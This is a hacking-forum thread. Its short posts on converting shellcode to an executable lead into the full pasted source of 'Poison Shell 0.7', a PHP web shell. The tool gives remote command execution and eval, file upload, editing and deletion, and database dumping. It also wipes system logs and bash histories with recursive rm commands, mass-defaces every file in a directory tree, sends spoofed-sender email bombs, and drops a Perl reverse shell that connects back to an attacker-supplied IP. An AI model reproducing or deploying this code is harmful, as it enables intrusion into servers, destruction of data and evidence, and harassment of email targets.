io.kent

Shellcode to Exe


Posted

code:

{******************************************************************************}
{** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING **}
{******************************************************************************}
{** **}
{** The prototypes, declarations and information in this file has been **}
{** compiled from various sources as well as through reverse engineering **}
{** techniques. We make no guarantee as to the correctness of the contents. **}
{** Caution is recommended, USE AT YOUR OWN RISK. **}
{** **}
{******************************************************************************}

I've used it a few times and it's very useful

http://sandsprite.com/shellcode_2_exe.php

iDefense Cyber Intelligence, Threat Intelligence and Security - Verisign

For analysing exploits it's useful to turn shellcode into an exe; the PHP script just copies the shellcode to the end of an exe or something similar, and the exe is a shellcode loader..

Posted

It's not very complicated to "execute" a shellcode:

((void (*)())shellcode)();

The conversion to an exe can be done with an "empty" exe, with headers only, and the shellcode is copied into the code section, at the entry point. I can't think of any great use for something like this at the moment, but well, it can probably be useful sometimes.

Posted (edited)

That's right, and there are other methods too; if I remember correctly there's something with bytes ..

But it's simpler the way nytro says.

But what about this one

[php shell] poison shell 0.7

code:

<?php

/*

Poison Shell 0.7


Doddy Hackman (C) Doddy Hackman


Mail : lepuke[at]hotmail[com]
Blog : doddy-hackman.blogspot.com

*/

@session_start();

$username = "a";
$password = "a";

if (isset($_POST['user'])) {
if ($_POST['user'] == $username && $_POST['pass'] == $password) {
$_SESSION['loginh'] = "1";
}
}

if (isset($_GET['chaunow'])) {
@session_destroy();
}

if ($_SESSION['loginh'] == 1) {

if (isset($_GET['info'])) {
die(phpinfo());
}

if (isset($_POST['sessionew'])) {
@session_start();
if ($_SESSION[$_POST['sessionew']] = $_POST['valor']) {
echo "<script>alert('Session created');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}


if(isset($_GET['bajardb'])) {

$tod = @mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']);
mysql_select_db($_GET['bajardb']);

$resultado = mysql_query("SHOW TABLES FROM ".$_GET['bajardb']);

while ($tabla = mysql_fetch_row($resultado)) {
foreach($tabla as $indice => $valor) {

$todo.= "<br><br>".$valor."<br><br>";

$resultadox = mysql_query("SELECT * FROM ".$valor);

$todo.="<table border=1>";

for ($i=0;$i< mysql_num_fields($resultadox);$i++) {
$todo.="<th>".mysql_field_name($resultadox,$i)."</th>";
}
while($dat = mysql_fetch_row($resultadox)) {
$todo.="<tr>";
foreach($dat as $val) {
$todo.="<td >".$val."</td>";
}
}
$todo.="</tr></table>";
}
}
@mysql_free_result($tod);
@header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");
@header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");
echo $todo;
exit(1);
}




if(isset($_GET['bajartabla'])) {
$tod = mysql_connect($_GET['host'],$_GET['usuario'],$_GET['password']) or die("<h1>Error</h1>");
mysql_select_db($_GET['condb']);
if(!empty($_GET['sentencia'])) {
$resultado = mysql_query($_GET['sentencia']);
} else {
$resultado = mysql_query("SELECT * FROM ".$_GET['bajartabla']);
}
$todo.="<table border=1>";
for ($i=0;$i< mysql_num_fields($resultado);$i++) {
$todo.="<th>".mysql_field_name($resultado,$i)."</th>";
}
while($dat = mysql_fetch_row($resultado)) {
$todo.="<tr>";
foreach($dat as $val) {
$todo.="<td>".$val."</td>";
}
}
@mysql_free_result($tod);
$todo.="</tr></table>";
@header("Content-type: application/vnd-ms-excel; charset=iso-8859-1");
@header("Content-Disposition: attachment; filename=".date('d-m-Y').".xls");
echo $todo;
exit(1);
}

if (isset($_GET['reload'])) {
$tipo = pathinfo($_GET['reload']);
echo '<meta http-equiv="refresh" content="0;URL=?dir='.$tipo['dirname'].'>';
exit(1);
}

function dame($file) {
return substr(sprintf('%o', fileperms($file)), -4);
}

if (isset($_GET['down'])) {
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($_GET['down']));
readfile($_GET['down']);
}

if (isset($_POST['cookienew'])) {
if (setcookie($_POST['cookienew'],$_POST['valor'])) {
echo "<script>alert('Cookie cREATED');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?cookiemanager">';
} else {
echo "<script>alert('Error');</script>";
}
}


echo '<style type="text/css">


.main {
margin : -287px 0px 0px -490px;
border : White solid 1px;
BORDER-COLOR: #00FF00;
}


#pie {
position: absolute;
bottom: 0;
}

body,a:link {
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00;
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>';

echo "<title>[+] PoisonShell (C) Doddy Hackman 2011 </title>";
echo "<table><tr><td class=main><br><h2>   PoisonShell   </h2><br></td><td class=main>
<b>System</b> : ".php_uname('s')." ".php_uname('r')." ".php_uname('v')."<br><b>Server</b> : ".$_SERVER['SERVER_SOFTWARE']."<br>";
echo "<b>IP</b> : ".$_SERVER['SERVER_ADDR']."      
<b>User</b> : uid=".getmyuid()." (".get_current_user().") gid=".getmygid()."      
<b>Path</b> : ".getcwd()."      
<b>Version PHP</b> : ".phpversion()."<br>";
if (ini_get('safe_mode')==0) {
echo "<b>Safe Mode</b> : OFF      ";
} else {
echo "<b>Safe Mode</b> : ON      ";
}
if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
echo "<b>Magic Quotes</b> : ON      ";
} else {
echo "<b>Magic Quotes</b> : OFF      ";
}
exec("perl -h",$perl);
if ($perl) {
echo "<b>Perl</b> : ON      ";
} else {
echo "<b>Perl</b> : OFF      ";
}
exec("wget --help",$wget);
if ($wget) {
echo "<b>WGET</b> : ON      ";
} else {
echo "<b>WGET</b> : OFF      ";
}
exec("curl_version",$curl);
if ($curl) {
echo "<b>CURL</b> : ON      ";
} else {
echo "<b>CURL</b> : OFF      ";
}

echo "</tr></td></table><br>";

echo "

<table>
<td class=main><a href=?dir=>Navigate</a></td><td class=main><a href=?cmd=>CMD</a></td>
<td class=main><a href=?upload=>Upload</a></td><td class=main><a href=?base64=>Base64</a></td>
<td class=main><a href=?phpconsole=>Eval</a></td><td class=main><a href=?info=>phpinfo</a></td>
<td class=main><a href=?bomber=>Mailer</a></td><td class=main><a href=?md5crack=>MD5Crack</a></td>
<td class=main><a href=?backshell>BackShell</a></td><td class=main><a href=?mass=>MassDefacement</a></td>
<td class=main><a href=?logs=>CleanLogs</a></td><td class=main><a href=?ftp=>FTP</a></td>
<td class=main><a href=?sql=>SQL</a></td><td class=main><a href=?cookiemanager=>Cookies</a></td>
<td class=main><a href=?sessionmanager=>Session</a></td>
<td class=main><a href=?chau=>Kill</a></td>
</table><br><br>
";




if(isset($_GET['perms'])) {
echo "
<form action='' method=POST>
File : <input type=text name=archivo value=".$_GET['perms'].">
<br>
Perms : <input type=text name=perms value=".dame($_GET['perms'])."
<br><br>
<input type=submit name=cambiarperms value=Change>
</form>
";
}
if (isset($_POST['cambiarperms'])) {
if (chmod($_POST['archivo'],$_POST['perms'])) {
echo "<script>alert('cHANGED');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>";
}

if (isset($_GET['ren'])) {
echo "
<form action='' method=POST>
File : <input type=text name=nombre value=".$_GET['ren']."><br>
Change to : <input type=text name=cambio><br><BR>
<input type=submit name=cambios value=Change><BR>
</form>
";
}

if (isset($_POST['cambios'])) {
if (@rename($_POST['nombre'],$_POST['cambio'])) {
echo "<script>alert('Changed');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['cambios'].">Atras</a><br><br></font></center>";
}



if (isset($_POST['crear1'])) {
chdir($_POST['dir']);
if (fopen($_POST['crear1'],"w")) {
echo "<script>alert('File cREATED');</script>";
}else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";
}

if (isset($_POST['crear2'])) {
chdir($_POST['dir']);
if (@mkdir($_POST['crear2'],777)) {
echo "<script>alert('Directory created');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['dir'].">Atras</a><br><br></font></center>";
}


if (isset($_GET['del'])) {
$tipo = filetype($_GET['del']);
if ($tipo == "dir") {
if (rmdir($_GET['del'])) {
echo "<script>alert('Directory Deleted');</script>";
} else {
echo "<script>alert('Error');</script>";
}
} else {
if (unlink($_GET['del'])) {
echo "<script>alert('File Deleted');</script>";
} else {
echo "<script>alert('Error');</script>";
}
}
echo "<br><br><font color=red><center><a href=?reload=".$_GET['del'].">Atras</a><br><br></font></center>";
}

if (isset($_GET ['copiar'])) {
echo '
<form action="" method=POST>
File : <input type=text name=archivo value='.$_GET['copiar'].'><br>
Copy to : <input type=text name=nuevo><br><br>
<input type=submit name=copiado value=Copy><BR>
</form>
';
}

if (isset($_POST['copiado'])) {
if (copy($_POST['archivo'],$_POST['nuevo'])) {
echo "<script>alert('OK');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_POST['archivo'].">Atras</a><br><br></font></center>";
}

if (isset($_GET['open'])) {
echo "<form action='' method=POST>";
echo "<center>";
echo "<textarea cols=80 rows=40 name=code>";
$archivo = file($_GET['open']);
foreach($archivo as $n=>$sub) {
$texto = htmlspecialchars($sub);
echo $texto;
}
echo "</center></textarea>";
echo "<br><br><center><input type=submit value=Save name=modificar></center><br><br>";
echo "</form>";
}

if (isset($_POST['modificar'])) {
$modi = fopen($_GET['open'],'w+');
if ($yeah = fwrite($modi,$_POST['code'])) {
echo "<script>alert('OK');</script>";
} else {
echo "<script>alert('Error');</script>";
}
echo "<br><br><font color=red><center><a href=?reload=".$_GET['open'].">Atras</a><br><br></font></center>";
}


if (isset($_GET['dir'])) {
if ($_GET['dir']=="") {
$path = getcwd();
chdir($path);
$dir = dir($path);
} else {
$path = $_GET['dir'];
chdir($path);
$dir = dir($path);
}
echo "
<br><br>
<form action='' method=GET>
<b>Directory</b> : <input type=text name=dir value=".$path."><input type=submit name=ir value=Navegar>
</form>
<br><br>
<form action='' method=POST>
<b>New File</b> : <input type=text name=crear1><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>
</form>
<form action='' method=POST>
<b>New Directory</b> : <input type=text name=crear2><input type=hidden name=dir value=".$dir->path."><input type=submit value=Crear>
</form><br><br>
";
$archivos = array('dir'=>array(),'file'=>array());
while ($archivo = $dir->read()) {
$ver = @filetype($path.'/'.$archivo) ;
if ($ver=="dir") {
$archivos['dir'][] = $path.'/'.$archivo;
} else {
$archivos['file'][] = $path.'/'.$archivo;
}
}
$dir->rewind();
echo "<br><b>Directory Found</b> : ".count($archivos['dir'])."<br>";
echo "<b>Files Found</b> : ".count($archivos['file'])."<br><br><br>";
echo "<table bgcolor=#00FF00 border=1>";
echo "<tr>";
foreach ($archivos['dir'] as $dirs) {
$dirsx = pathinfo($dirs);
echo "<td width=100><a href=?dir=".$dirs.">".$dirsx['basename']."</a></td>";
echo "<td width=100><a href=?ren=".$dirs.">Move</a></td>";
echo "<td width=100><a href=?del=".$dirs.">Delete</a></td>";
echo "<td width=100><a href=?perms=".$dirs.">Perms</a></td>";
echo "<td width=100>--</td>";
echo "<td width=100>--</td>";
echo "</tr><tr>";
}
foreach ($archivos['file'] as $files) {
$filex = pathinfo($files);
echo "<td width=100><a href=?open=".$files.">".$filex['basename']."</a></td>";
echo "<td width=100><a href=?ren=".$files.">Move</a></td>";
echo "<td width=100><a href=?del=".$files.">Delete</a></td>";
echo "<td width=100><a href=?perms=".$files.">Perms</a></td>";
echo "<td width=100><a href=?copiar=".$files.">Copy</a></td>";
echo "<td width=100><a href=?down=".$files.">Download</a></td>";
echo "</tr><tr>";
}
echo "</table>";
}


if (isset($_GET['cmd'])) {
echo '
<form action="" method=POST>
Command : <input type=text name=comando size=50><input type=submit name=ejecutar value=Now>
</form>
';
}
if (isset($_POST['ejecutar'])) {
echo '
<br><br>Command<br><br>
<fieldset>
'.$_POST['comando'].'</fieldset>
<br><br>Result<br><br><fieldset>';
if (!system($_POST['comando'])) {
echo "<script>alert('Error loading command');</script>";
echo "Error";
}
echo "</fieldset><br><br>";
}

if (isset($_GET['upload'])) {
echo "<center><h2>Upload files</h2></center><center><br><br><br>";
echo '
<form enctype="multipart/form-data" action="" method=POST>
File : <input type=file name=archivo><br><br>
Directory : <input type=text name=destino value='.getcwd().'>
<input type=submit value=Upload><br>
</form>';
if (isset($_FILES['archivo'])) {
$subimos = basename($_FILES['archivo']['name']);
if (move_uploaded_file($_FILES['archivo']['tmp_name'],$subimos)) {
if (copy($subimos,$_POST['destino']."/".$subimos)) {
unlink($subimos);
echo "<script>alert('File uploaded');</script>";
}
} else {
echo "<script>alert('Error');</script>";
}
}
}

if (isset($_GET['base64'])) {
echo '
<form action="" method=POST>
Encode : <input type=text name=code size=50><input type=submit name=codificar value=Encode>
</form>
<form action="" method=POST>
Decode : <input type=text name=decode size=50><input type=submit name=decodificar value=Decode>
</form>
';
}
if (isset($_POST['codificar'])) {
echo "<br><br>Text<br><br><fieldset>".$_POST['code']."</fieldset><br><br>Result<br><br><fieldset>";
echo base64_encode($_POST['code']) ;
echo "</fieldset><br><br>";
}

if (isset($_POST['decodificar'])) {
echo "<br><br>Text<br><br><fieldset>".$_POST['decode']."</fieldset><br><br>Result<br><br><fieldset>";
echo base64_decode($_POST['decode']);
echo "</fieldset><br><br>";
}


if (isset($_GET['phpconsole'])) {
echo '
<form action="" method=POST>
Code : <input type=text name=codigo size="70"><input type=submit name=cargar value=OK>
</form>
';
}
if (isset($_POST['cargar'])) {
echo "<br><br>Code<br><br>
<fieldset>
".$_POST['codigo']."
</fieldset>
<br><br>
Result<br><br>
<fieldset>";

eval($_POST['codigo']);
echo "</fieldset>
";
}




if (isset($_GET['logs'])) {
echo '
<br><br><center><h3>Zapper</h3>
<br><br>
<form action="" method=GET>
<input type=submit name=clean value=Start>
</form></center>
<br><br>
';
}

if (isset($_GET['clean'])) {

$paths = array("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba","/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth");

$comandos = array('find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST');

foreach($paths as $path) {
if(@unlink($path)) {
echo $path.": Deleted<br>";
}
}
echo "<br><br>";
foreach($comandos as $comando) {
echo "Loading command : ".$comando."<br>";
system($comando);
}
}


if(isset($_GET['mass'])) {
echo "
<form action='' method=POST>
Directory to start : <input type=text name=dir value=".getcwd()."><br><br>
Code : <input type=text name=codigo size=70>
<input type=submit name=def value=Start>
</form>
";
}
if (isset($_POST['def'])) {
juntar($_POST['dir'],$_POST['codigo']);
}
function juntar ($dira,$text) {
$dir= opendir($dira);
while (!is_bool($archivos = readdir($dir))) {
if ($archivos != "..") {
if ($archivos != ".") {
if ($archivos != basename($_SERVER['PHP_SELF'])) {
if (@filetype($dira."/".$archivos) == dir) {
juntar($dira."/".$archivos,$text);
} else {
echo "Deface : ".$dira."/".$archivos."<br>";
$solo = fopen($dira."\\".$archivos,"w");
$solo = fwrite($solo,$text);
fclose($solo);
}}}}}}


if (isset($_GET['chau'])) {
if ($_GET['chau'] == "fuckit") {
echo "<br><br><h3>Kapoom !!!</h3><br><br>";
//unlink(basename($_SERVER['PHP_SELF']));
} else {
echo "<br><br><font color=red><h3><center>Acceso Denegado</center></h3></font><br><br>";
}
}



if (isset($_GET['bomber'])) {
echo "
<form action='' method=POST>
Target : <input type=text name=idiot value=@hotmail.com><br>
Fake mail : <input type=text name=falso><br>
Fake name : <input type=text name=nombrefalso><br>
Subject : <input type=text name=asunto><br>
Count : <input type=text name=count value=1><br>
Message : <input type=text name=mensaje size=60><br><br>
<br><input type=submit name=bombers value=Now>
</form>";
}

if (isset($_POST['bombers'])) {

$need .="MIME-Version: 1.0\n";
$need .="Content-type: text/html ; charset=iso-8859-1\n";
$need .="MIME-Version: 1.0\n";
$need .="From: ".$_POST['nombrefalso']." <".$_POST['falso'].">\n";
$need .="To: ".$_POST['nombrefalso']."<".$_POST['falso'].">\n";
$need .="Reply-To:".$_POST['falso']."\n";
$need .="X-Priority: 1\n";
$need .="X-MSMail-Priority:Hight\n";
$need .="X-Mailer:Widgets.com Server";


echo "<br><br><br><center><h2>Result</h2></center><br><br>";

for ($i = 1; $i <= $_POST['count']; $i++) {
if(@mail($_POST['idiot'],$_POST['asunto'],$_POST['mensaje'],$need)) {
echo "[+] Message <b>$i</b> Send<br>";
flush();
} else {
echo "[+] Message <b>$i</b> not Send<br>";
}}}

if (isset($_GET['md5crack'])) {

echo "

<form action='' method=POST
<b>Hash</b> : <input type=text name=md5 size=50><br><br>
<b>Salt</b> : <input type=text name=salto size=50><br>
<br><h3>Wordlist</h3>
<textarea cols=80 rows=40 name=code></textarea>
<br><br>
<input type=submit value=Crack>
</form>
";

}

if (isset($_POST['md5'])) {
echo "<br><br><fieldset>";
echo "[+] Starting the search<br><br>";

$total = explode("\n",$_POST['code']);

foreach ($total as $linea){

$linea = chop($linea);

if (!empty($_POST['salto'])) {
$test = md5($linea.$_POST['salto']);
} else {
$test = md5($linea);
}

if ($test == $_POST['md5']) {
echo "<br>[+] Hash Cracked : ".$_POST['md5'].":".$linea."<br><br>";
exit(1);
} else {
echo "[+] : ".$_POST['md5']." != ".$linea."<br>";
}
}
echo "<br>[+] Finished<br>";
echo "</fieldset>";
}

if (isset($_GET['cookiemanager'])) {
echo "<h2>Cookies</h2><br><br>";
echo "[+] <b>Cookies Found</b> : ".count($_COOKIE)."<br><br>";

echo "
<br><BR><form action='' method=POST>
New cookie : <input type=text name=cookienew><BR>
Value : <input type=text name=valor><BR><br>
<input type=submit value=Create><BR><br><br>
</form><br>";


echo "<table>";
echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>";

if (count($_COOKIE) != 0) {
foreach ($_COOKIE as $nombre=>$valor) {
echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";
}
echo "</table>";
}

echo "<br><br>";
}

if (isset($_GET['sessionmanager'])) {

@session_start();

echo "<h2>Session</h2><br><br>";
echo "[+] <b>Sessions Found</b> : ".count($_SESSION)."<br><br>";


echo "
<br><BR><form action='' method=POST>
New session : <input type=text name=sessionew><BR>
Value : <input type=text name=valor><BR><br>
<input type=submit value=Create><BR><br><br>
</form><br>";


if (count($_SESSION) != 0) {

echo "<table>";
echo "<td class=main><b>Name</b></td><td class=main><b>Value</b></td><tr>";

foreach ($_SESSION as $nombre=>$valor) {
echo "<td class=main>".$nombre."</td><td class=main>".$valor."</td><tr>";
}
echo "</table>";
}
}

if (isset($_GET['ftp'])) {
echo "<h2>FTP Manager</h2><br><br>";
echo "

<form action='' method=GET>
Server : <input type=text name=serverftp value=127.0.0.1><br>
User : <input type=text name=user value=doddy><br>
Pass : <input type=text name=pass value=123><br><br><br>
<input type=hidden name=diar value=/>
<input type=submit value=Connect><br><br>
</form>
";

}

if (isset($_GET['renamenow'])) {

echo "

<form action='' method=GET>
File : <input type=text name=renamenowx value=".$_GET['renamenow']."><br>
New name : <input type=text name=newname><br><br>
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">
<input type=hidden name=diar value=".$_GET['diar'].">
<input type=submit value=Rename>
</form>
";
exit(1);
}


if (isset($_GET['renamenowx'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (ftp_rename($enter,$_GET['renamenowx'],$_GET['newname'])) {
echo "<script>alert('Changed');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}
}



if (isset($_GET['deletenow'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if ($_GET['controla'] == "dir") {
if (@ftp_rmdir($enter,$_GET['deletenow'])) {
echo "<script>alert('Directory Deleted');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}

} else {

if (@ftp_delete($enter, $_GET['deletenow'])) {
echo "<script>alert('File Deleted');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}

}
}


if (isset($_GET['permsdown'])) {

echo "<form action='' method=GET>
File : <input type=text name=filetochange value=".$_GET['permsdown'].">
Perms : <input type=text name=pe value=0777 >
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">
<input type=submit value=Change>
</form>";
exit(1);
}

if (isset($_GET['filetochange'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (@ftp_chmod($enter,$_GET['pe'],$_GET['filetochange'])) {
echo "<script>alert('Changed');</script>";
} else {
echo "<script>alert('Error');</script>";
}

}


if (isset($_GET['serverftp'])) {

if ($enter = @ftp_connect("127.0.0.1")) {
if ($dentro = @ftp_login($enter,"doddy","123")) {
echo "<br><b>[+] Connected to server</b><br>";
} else {
echo "<br><b>[-] Error in the login</b><br><br>";
}

echo "<b>[+] ONline</b><br><br><br>";

echo "

<form action='' method=GET>
Directory : <input type=text name=diar value=";
if (empty($_GET['diar'])) {
echo ftp_pwd($enter);
} else {
echo $_GET['diar'];
}

echo ">
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">

<input type=submit value=Load>
</form>
<br><br>
<form action='' method=GET>
New directory : <input type=text name=newdirftp><input type=submit value=Load>
<input type=hidden name=serverftp value=".$_GET['serverftp'].">
<input type=hidden name=user value=".$_GET['user'].">
<input type=hidden name=pass value=".$_GET['pass'].">
<input type=hidden name=diar value=".$_GET['diar'].">
</form>
<br><br>

<br><br>";

if (isset($_GET['diar'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (empty($_GET['diar'])) {

if (!$lista = ftp_nlist($enter.".")) {
echo "<script>alert('Error loading directory');</script>";
exit(1);
}

} else {

if (!$lista = ftp_nlist($enter,$_GET['diar'])) {
echo "<script>alert('Error loading directory');</script>";
exit(1);
}

}
}

echo "<table>";
foreach ($lista as $ver) {
echo "<td class=main>".$ver."</td>";

if (ftp_size($enter,ftp_pwd($enter).$ver) == -1) {

echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">Enter</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=dir&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>";
echo "<td class=main>--</a></td><tr>";

} else {

echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$ver.">--</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&renamenow=".$ver.">Rename</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&controla=file&diar=".$_GET['diar']."&deletenow=".$ver.">Delete</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&permsdown=".$ver.">Perms</a></td>";
echo "<td class=main><a href=?serverftp=".$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar']."&downfile=".$ver.">Download</a></td><tr>";

}

}

echo "</table>";

} else {
echo "<b>[-] Error in the server</b><br><br>";
}
}


if (isset($_GET['downfile'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

$nuevo = fopen(basename($_GET['downfile']),'w');

if (ftp_fget($enter,$nuevo,$_GET['downfile'], FTP_ASCII, 0)) {
echo "<script>alert('File Download');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error in the download');</script>";
}

ftp_close($enter);
fclose($nuevo);

}

if (isset($_GET['newdirftp'])) {

$enter = ftp_connect($_GET['serverftp']);
$dentro = ftp_login($enter,$_GET['user'],$_GET['pass']);

if (ftp_mkdir($enter,$_GET['diar'].$_GET['newdirftp'])) {
echo "<script>alert('Directory created');</script>";
echo '<meta http-equiv="refresh" content="0;URL=?serverftp='.$_GET['serverftp']."&user=".$_GET['user']."&pass=".$_GET['pass']."&diar=".$_GET['diar'].'>';
} else {
echo "<script>alert('Error');</script>";
}
}

if (isset($_GET['backshell'])) {

echo "

<form action='' method=GET>
IP : <input type=text name=ip value=".$_SERVER['REMOTE_ADDR']."><br>
Port : <input type=text name=port value=666><br><br>
Type : <select name=tipo>
<option>Perl</option>
</select>
<br><br><br>
<input type=submit value=Conectar>

";
}

if (isset($_GET['ip'])) {


if ($_GET['tipo']=="Perl") {

$code = '
#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) {
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {

socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}

# ¿ The End ?

';

$de = $_SERVER["HTTP_USER_AGENT"];

if(eregi("Win",$de)){
if ($test = fopen("back.pl","w")) {
echo "<br><br><b>[+] Shell Created</b><br>";
} else {
echo "<br><br><b>[-] Error creating the shell</b><br>";
}
} else {

if ($test = fopen("/tmp/back.pl","w")) {
echo "<br><br><b>[+] Shell Created</b><br>";
} else {
echo "<br><br><b>[-] Error creating the shell</b><br>";
}

}

if (fwrite($test,$code)) {

if(eregi("Win",$de)){
if (chmod("back.pl",0777)) {
echo "<b>[+] Perms Changed<br></b>";
} else {
echo "<b>[-] Not priviligies to changed permissions</b><br>";
}
echo "<b>[+] Loading Shell</b><br><br><br>";
echo "<fieldset>";
if (!system("perl back.pl ".$_GET['ip']. " ".$_GET['port'])) {
echo "<script>alert('Error Loading Shell');</script>";
}
echo "</fieldset>";
} else {
if (chmod("/tmp/back.pl",0777)) {
echo "<b>[+] Perms Changed<br></b>";
} else {
echo "<b>[-] Not priviligies to changed permissions</b><br>";
}
echo "<b>[+] Loading Shell</b><br><br><br>";
echo "<fieldset>";
if (!system("cd /tmp;perl back.pl ".$_GET['ip']. " ".$_GET['port'])) {
echo "<script>alert('Error Loading Shell');</script>";
}
echo "</fieldset>";
}
} else {
echo "<br><b>[-] Error writing in the shell<br><br></b>";
}
}
}

